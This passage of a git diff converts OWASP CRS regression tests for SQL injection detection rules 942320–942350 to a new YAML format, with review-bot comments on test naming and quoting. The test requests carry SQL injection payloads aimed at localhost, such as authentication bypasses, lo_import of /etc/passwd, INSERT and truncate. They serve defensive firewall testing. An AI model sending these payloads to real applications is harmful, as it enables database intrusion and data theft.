User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/index.php?id=password::int" + version: HTTP/1.0 + output: + log: + expect_ids: [942320] + - test_id: 6 desc: "Detects PostgreSQL data conversion with ::bool" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/index.php?no=2&id=1%27%20and%20unistr(password)::bool--" - version: HTTP/1.0 - output: - log_contains: id "942320" - - test_title: 942320-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/index.php?no=2&id=1%27%20and%20unistr(password)::bool--" + version: HTTP/1.0 + output: + log: + expect_ids: [942320] + - test_id: 7 desc: "Detects PostgreSQL bypass attempt with div(23,-2) - issue #2910" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/index.php?id=div(23,-2)" - version: HTTP/1.0 - output: - log_contains: id "942320" - - test_title: 942320-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/index.php?id=div(23,-2)" + version: HTTP/1.0 + output: + log: + expect_ids: [942320] + - test_id: 8 desc: "Detects PostgreSQL bypass attempt with div (23.23 , 2) - issue #2910" 
stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/index.php?id=div+(23.23+,+2)" - version: HTTP/1.0 - output: - log_contains: id "942320" - - test_title: 942320-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/index.php?id=div+(23.23+,+2)" + version: HTTP/1.0 + output: + log: + expect_ids: [942320] + - test_id: 9 desc: "Detects PostgreSQL bypass attempt lo_import'( - issue #2912" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/index.php?id=lo_import(%27/etc%27%20||%20%27/pass%27%20||%20%27wd%27)" - version: HTTP/1.0 - output: - log_contains: id "942320" - - test_title: 942320-10 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/index.php?id=lo_import(%27/etc%27%20||%20%27/pass%27%20||%20%27wd%27)" + version: HTTP/1.0 + output: + log: + expect_ids: [942320] + - test_id: 10 desc: "Detects PostgreSQL bypass attempt with lo_get(16400) - issue #2924" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/index.php?id=lo_get(16400)" - version: 
HTTP/1.0 - output: - log_contains: id "942320" - - test_title: 942320-11 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/index.php?id=lo_get(16400)" + version: HTTP/1.0 + output: + log: + expect_ids: [942320] + - test_id: 11 desc: "Detects PostgreSQL bypass attempt function(foo)::text - issue #2924" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/index.php?id=function(foo)::text" - version: HTTP/1.0 - output: - log_contains: id "942320" - - test_title: 942320-12 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/index.php?id=function(foo)::text" + version: HTTP/1.0 + output: + log: + expect_ids: [942320] + - test_id: 12 desc: "Detects PostgreSQL bypass attempt function(foo)::bigint - issue #2924" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/index.php?id=function(foo)::bigint" - version: HTTP/1.0 - output: - log_contains: id "942320" - - test_title: 942320-13 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/index.php?id=function(foo)::bigint" + version: 
HTTP/1.0 + output: + log: + expect_ids: [942320] + - test_id: 13 desc: "Detects PostgreSQL bypass attempt function(foo)::double precision - issue #2924" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/index.php?id=function(foo)::double%20precision" - version: HTTP/1.0 - output: - log_contains: id "942320" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/index.php?id=function(foo)::double%20precision" + version: HTTP/1.0 + output: + log: + expect_ids: [942320] diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942321.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942321.yaml index 2ebdb6753..5a111a28a 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942321.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942321.yaml 
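Review bot: Tests 1 through 4 all carry the identical `desc: "Detects MySQL and PostgreSQL stored procedure/function injections"` although each sends a different body (`var=procedure%20analyse%20%28`, `pay=exec+%28%40%0A`, `pay=declare+%40b%0A`, `pay=DECLARE%2F%2A%2A%2F%40x%0A`), so a failing test_id in the go-ftw output cannot be mapped to the construct it covers without opening the file. The later tests in this hunk show the better pattern (`desc: "Detects PostgreSQL data conversion with ::int"`), and tests 5–8 in the 942340 hunk have the same issue with `"basic SQL authentication bypass attempts 3/3"`. I would name the construct in each desc, e.g. `desc: "Detects MySQL procedure analyse ("` for test 1 and `desc: "Detects MSSQL exec (@ with newline"` for test 2.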
@@ -1,38 +1,37 @@ --- meta: author: "Franziska Bühler, azurit" - enabled: true - name: 942321.yaml +rule_id: 942321 tests: - - test_title: 942321-1 + - test_id: 1 desc: "Detects MySQL and PostgreSQL stored procedure/function injections" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: encode(lo_get(16200),'base64')::int - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get" - version: HTTP/1.0 - output: - log_contains: id "942321" - - test_title: 942321-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: encode(lo_get(16200),'base64')::int + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get" + version: HTTP/1.0 + output: + log: + expect_ids: [942321] + - test_id: 2 desc: "Detects MySQL and PostgreSQL stored procedure/function injections" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: overlay(password placing $$$$ from 1)::int and id=1 - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get" - version: HTTP/1.0 - output: - log_contains: id "942321" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: overlay(password placing $$$$ from 1)::int and id=1 + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get" + version: HTTP/1.0 + output: + log: + expect_ids: [942321] diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942330.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942330.yaml index 6cee8d0ce..5f3f31499 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942330.yaml 
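Review bot: The User-Agent values that carry the test payload are plain scalars, `User-Agent: encode(lo_get(16200),'base64')::int` and `User-Agent: overlay(password placing $$$$ from 1)::int and id=1`, while every sibling file in this commit quotes the header value and this hunk quotes `uri`. Both parse as strings today, but a later edit that introduces `: ` or ` #` into the value would silently change the parse, and the quoted form `User-Agent: "encode(lo_get(16200),'base64')::int"` makes the intended string explicit and consistent with the rest of the files.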
+++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942330.yaml 
@@ -1,94 +1,92 @@ --- meta: author: "Christian S.J. Peron, azurit" - description: None - enabled: true - name: 942330.yaml +rule_id: 942330 tests: - - test_title: 942330-1 + - test_id: 1 desc: "classic SQL injection probings 1/3" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=%22%27&var2=whatever" - version: HTTP/1.0 - output: - log_contains: id "942330" - - test_title: 942330-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=%22%27&var2=whatever" + version: HTTP/1.0 + output: + log: + expect_ids: [942330] + - test_id: 2 desc: "Test first backslash match ([\"'`\x5c]*?)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=\\\"1 or 1-" - version: HTTP/1.0 - output: - log_contains: id "942330" - - test_title: 942330-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=\\\"1 or 1-" + version: HTTP/1.0 + output: + log: + expect_ids: [942330] + - test_id: 3 desc: "Test second backslash match (\x5cx(?:23|27|3d))" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=\\x23" - version: HTTP/1.0 - output: - log_contains: id "942330" - - test_title: 942330-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=\\x23" + version: HTTP/1.0 + output: + log: + expect_ids: [942330] + - test_id: 4 desc: "Test false positive issue nr. 3205" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: | - "var=05111222333 - andy.surname@somedomain.com" - version: HTTP/1.0 - output: - no_log_contains: id "942330" - - test_title: 942330-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: | + "var=05111222333 + andy.surname@somedomain.com" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942330] + - test_id: 5 desc: "Test false positive issue nr. 
3205" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=05111222333 andy.surname@somedomain.com" - version: HTTP/1.0 - output: - no_log_contains: id "942330" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=05111222333 andy.surname@somedomain.com" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942330] diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942340.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942340.yaml index 901d8a697..88a871dbf 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942340.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942340.yaml 
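Review bot: In test 4 the `data: |` block scalar keeps the surrounding double quotes and the trailing newline as part of the request body, so what is sent is `"var=05111222333`, a newline, `andy.surname@somedomain.com"` and a final newline — the `var` parameter value begins with a literal `"`, unlike test 5 where the body is `var=05111222333 andy.surname@somedomain.com` with no quotes. If the quotes are only meant to delimit the value, `data: |-` with the two lines unquoted would send the parameter the same way test 5 does and make the pair differ only in the separator. If the leading quote is deliberate for the issue 3205 reproduction, a comment above the stage saying so would stop the next reader from "fixing" it.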
@@ -1,191 +1,189 @@ --- meta: author: "Christian S.J. Peron, azurit" - description: None - enabled: true - name: 942340.yaml +rule_id: 942340 tests: - - test_title: 942340-1 + - test_id: 1 desc: "basic SQL authentication bypass attempts 3/3" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - # in ( select * from - uri: "/get?var=in%20%28%20select%20%2a%20from" - version: HTTP/1.0 - output: - log_contains: id "942340" - - test_title: 942340-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + # in ( select * from + uri: "/get?var=in%20%28%20select%20%2a%20from" + version: HTTP/1.0 + output: + log: + expect_ids: [942340] + - test_id: 2 desc: "SQLite authentication bypass with except select" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - # except \tselect.1,2 - uri: "/get?var=except%20%09select.1%2C2" - version: HTTP/1.0 - output: - log_contains: id "942340" - - test_title: 942340-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + # except \tselect.1,2 + uri: "/get?var=except%20%09select.1%2C2" + version: HTTP/1.0 + output: + log: + expect_ids: [942340] + - test_id: 3 desc: "SQLite authentication bypass with except values" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: 
localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - # except values (1,2) - uri: "/get?var=except%20values(1%2C2)" - version: HTTP/1.0 - output: - log_contains: id "942340" - - test_title: 942340-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + # except values (1,2) + uri: "/get?var=except%20values(1%2C2)" + version: HTTP/1.0 + output: + log: + expect_ids: [942340] + - test_id: 4 desc: "true-negative except selecting" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - # except selecting - uri: "/get?var=except%20selecting" - version: HTTP/1.0 - output: - no_log_contains: id "942340" - - test_title: 942340-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + # except selecting + uri: "/get?var=except%20selecting" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942340] + - test_id: 5 desc: "basic SQL authentication bypass attempts 3/3" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "email=x'%20or%20array[id]%20is%20not%20null--" - version: HTTP/1.0 - output: - log_contains: id "942340" - - test_title: 942340-6 + - input: + dest_addr: 
127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "email=x'%20or%20array[id]%20is%20not%20null--" + version: HTTP/1.0 + output: + log: + expect_ids: [942340] + - test_id: 6 desc: "basic SQL authentication bypass attempts 3/3" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "email=x'%20or%20email~all(array[email]);analyze--" - version: HTTP/1.0 - output: - log_contains: id "942340" - - test_title: 942340-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "email=x'%20or%20email~all(array[email]);analyze--" + version: HTTP/1.0 + output: + log: + expect_ids: [942340] + - test_id: 7 desc: "basic SQL authentication bypass attempts 3/3" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "email='%20and%20email%20not%20similar%20to%20id--" - version: HTTP/1.0 - output: - log_contains: id "942340" - - test_title: 942340-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "email='%20and%20email%20not%20similar%20to%20id--" + version: 
HTTP/1.0 + output: + log: + expect_ids: [942340] + - test_id: 8 desc: "basic SQL authentication bypass attempts 3/3" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "email='%20or%20true;%20foo" - version: HTTP/1.0 - output: - log_contains: id "942340" - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "email='%20or%20false;%20foo" - version: HTTP/1.0 - output: - log_contains: id "942340" - - test_title: 942340-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "email='%20or%20true;%20foo" + version: HTTP/1.0 + output: + log: + expect_ids: [942340] + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "email='%20or%20false;%20foo" + version: HTTP/1.0 + output: + log: + expect_ids: [942340] + - test_id: 9 desc: "basic SQL authentication bypass attempts 3/3 (no whitespace between operator)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "email='||true" - version: HTTP/1.0 - output: - log_contains: id 
"942340" - - test_title: 942340-10 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "email='||true" + version: HTTP/1.0 + output: + log: + expect_ids: [942340] + - test_id: 10 desc: "SQL Auth Bypass FP test (invalid operator without whitespace)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "email='ortrue" - version: HTTP/1.0 - output: - no_log_contains: id "942340" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "email='ortrue" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942340] diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942350.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942350.yaml index 23246f00b..7934f55fc 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942350.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942350.yaml 
@@ -1,74 +1,72 @@ --- meta: author: "Christian S.J. Peron, Franziska Bühler, azurit" - description: None - enabled: true - name: 942350.yaml +rule_id: 942350 tests: - - test_title: 942350-1 + - test_id: 1 desc: "MySQL UDF injection and other data/structure manipulation" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - # ; insert INTO table (word) VALUES('dfsd') - uri: "/get?var=%3bINSERT%20INTO%20table%20%28col%29%20VALUES" - version: HTTP/1.0 - output: - log_contains: id "942350" - - test_title: 942350-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + # ; insert INTO table (word) VALUES('dfsd') + uri: "/get?var=%3bINSERT%20INTO%20table%20%28col%29%20VALUES" + version: HTTP/1.0 + output: + log: + expect_ids: [942350] + - test_id: 2 desc: "Fix for FP reported in GitHub issue 1587" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - # ;insertion_424242 - uri: "/get?var=%3Binsertion_424242" - version: HTTP/1.0 - output: - no_log_contains: id "942350" - - test_title: 942350-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + # ;insertion_424242 + uri: "/get?var=%3Binsertion_424242" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942350] + - test_id: 3 desc: "MySQL create function injection" 
stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - # CREATE FUNCTION hello (s CHAR(20)) RETURNS CHAR(50) DETERMINISTIC RETURN CONCAT('Hello, ',s,'!'); - uri: "/get?var=CREATE+FUNCTION+hello+%28s+CHAR%2820%29%29+RETURNS+CHAR%2850%29+DETERMINISTIC+RETURN+CONCAT%28%27Hello%2C+%27%2Cs%2C%27%21%27%29%3B" - version: HTTP/1.0 - output: - log_contains: id "942350" - - test_title: 942350-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + # CREATE FUNCTION hello (s CHAR(20)) RETURNS CHAR(50) DETERMINISTIC RETURN CONCAT('Hello, ',s,'!'); + uri: "/get?var=CREATE+FUNCTION+hello+%28s+CHAR%2820%29%29+RETURNS+CHAR%2850%29+DETERMINISTIC+RETURN+CONCAT%28%27Hello%2C+%27%2Cs%2C%27%21%27%29%3B" + version: HTTP/1.0 + output: + log: + expect_ids: [942350] + - test_id: 4 desc: "Status Page Test - MySQL injection with ;truncate[xx" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?test=;truncate[xx" - version: HTTP/1.0 - output: - log_contains: id "942350" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?test=;truncate[xx" + version: HTTP/1.0 + output: + log: + expect_ids: [942350] 
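Review bot: In test 1 of 942350.yaml the comment carried onto the new side, `# ; insert INTO table (word) VALUES('dfsd')`, does not describe the uri directly beneath it, which decodes to `;INSERT INTO table (col) VALUES`; the comment exists only to show the decoded payload, so it should read `# ;INSERT INTO table (col) VALUES`. The equivalent decoded-form comments on tests 2 and 3 do agree with their uris, so this is the only stale one in the file. Test 2's `no_expect_ids: [942350]` is the right shape for the issue-1587 false-positive regression, since it asserts only that this rule stays silent on that input rather than that the request is clean overall.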
diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942360.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942360.yaml
index 860b3b966..3631ba1b1 100644
--- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942360.yaml
+++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942360.yaml
